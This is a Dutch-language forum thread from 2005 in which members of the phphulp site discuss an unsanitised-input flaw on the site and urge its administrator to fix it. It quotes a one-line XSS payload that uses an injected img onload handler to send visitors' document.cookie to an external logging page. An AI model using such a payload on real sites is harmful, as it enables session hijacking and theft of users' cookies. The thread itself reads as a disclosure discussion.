input veldjes phphulp

Sebastiaan schreef op 30.11.2005 14:49

Mitch had een img plaatje d.m.v een lek een onload attribuut gegeven met een javascriptje naar zijn php pagina die de document.cookie logde van iedereen die erop kwam. Smerig hè?

[img ]http://www.plaatje.nl"; onload="document.location='http://adres.naar/zijn/php/pagina.php?log='+document.cookie[/img ]
zoiets

whaha vint eigelijk wel mooi bedacht.. Zolang je dr maar geen misbruik van gaat maken..

die "bugs".. Tis een beetje jammer, dat als iedereen een alert in zn naam zou zette dat alert box aangeropen word, dat is nogal irritant.. Maargoed ik denk nie dat hier van die kinderachtige gasten bij zitten..

Als dat wel gebeurt zijn er genoeg mods.. tog?

Ik heb eventjes getest wat Erik zei, en dat belooft niet veel goeds, zeker niet toen ik mijn naam weer aan wilde passen:

Ja, omdat je html erin blijft staan!

Leuk is dit, een van de grootste beginners fouten.

Pfoe ik merkte het! ;-)
Dikke zooi opeens...
Als je er nou een redirect iets in zit naar de hoofdpagina? Werkt dat ook?
(Ik ga het in ieder geval niet proberen O:-D)

Ik zal even weer gewoon doen. Speeltijd voorbij, dit is een ernstige zaak!

indd Stefan.
Bas zal als een van de beste weten dat dit grote gevolgen kan hebben als een kwaadwillige gebruiker hier mee gaat spelen,
hij is al vaak genoeg online geweest maar doet niks.

ik heb hem een pb gestuurd
ik heb dit topic gemaakt en hij laat niks van zich horen.

Het is misschien mijn probleem niet maar ik weet zeker dat de gemiddelde webmaster zoiets gelijk zou beveiligen.

Ja dat is echt een slordige fout en vooral voor phphulp.